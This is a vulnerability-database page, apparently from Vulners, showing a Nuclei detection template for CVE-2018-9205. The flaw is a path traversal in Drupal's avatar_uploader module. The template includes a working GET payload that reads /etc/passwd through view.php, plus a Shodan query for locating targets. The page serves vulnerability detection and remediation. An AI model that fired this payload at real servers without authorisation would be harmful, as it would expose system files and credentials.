Vulners
Lucene search
Drupal avatar_uploader v7.x-1.0-beta8 - Local File Inclusion
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | Drupal Avatar Uploader 7.x-1.0-beta8 Arbitary File Download Vulnerability | 22 Apr 201800:00 | – | zdt |
 | CVE-2018-9205 | 4 Apr 201815:29 | – | attackerkb |
 | CVE-2018-9205 | 23 Dec 202400:00 | – | circl |
 | Drupal avatar_uploader arbitrary file download vulnerability | 9 Apr 201800:00 | – | cnvd |
 | CVE-2018-9205 | 4 Apr 201815:00 | – | cve |
 | CVE-2018-9205 | 4 Apr 201815:00 | – | cvelist |
 | Drupal Avatar Uploader File Disclosure | 19 May 201800:00 | – | dsquare |
 | Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure | 23 Apr 201800:00 | – | exploitdb |
 | Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure | 23 Apr 201800:00 | – | exploitpack |
 | CVE-2018-9205 | 4 Apr 201815:29 | – | nvd |
10
id: CVE-2018-9205
info:
name: Drupal avatar_uploader v7.x-1.0-beta8 - Local File Inclusion
author: daffainfo
severity: high
description: In avatar_uploader v7.x-1.0-beta8 the view.php program doesn't restrict file paths, allowing unauthenticated users to retrieve arbitrary files.
impact: |
Unauthenticated attackers can read arbitrary files from the server, potentially exposing sensitive configuration files, credentials, and user data.
remediation: Upgrade to the latest version of avatar_uploader.
reference:
- https://www.exploit-db.com/exploits/44501
- https://nvd.nist.gov/vuln/detail/CVE-2018-9205
- https://www.drupal.org/project/avatar_uploader/issues/2957966
- https://www.drupal.org/project/avatar_uploader
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-9205
cwe-id: CWE-22
epss-score: 0.81446
epss-percentile: 0.992
cpe: cpe:2.3:a:drupal:avatar_uploader:7.x-1.0:beta8:*:*:*:*:*:*
metadata:
max-request: 1
vendor: drupal
product: avatar_uploader
shodan-query: http.component:"drupal"
tags: cve,cve2018,lfi,drupal,edb,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 490a00463044022054cd10cbd69f0aebfa25a55be10a2c26f93252f7567bbbf3eea0a1a3895f900702203c195e3fb3de0f4fa668adac57dc91b4e262298e2f94b97c26ac480bd06a548e:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 25
CVSS 37.5
EPSS0.81446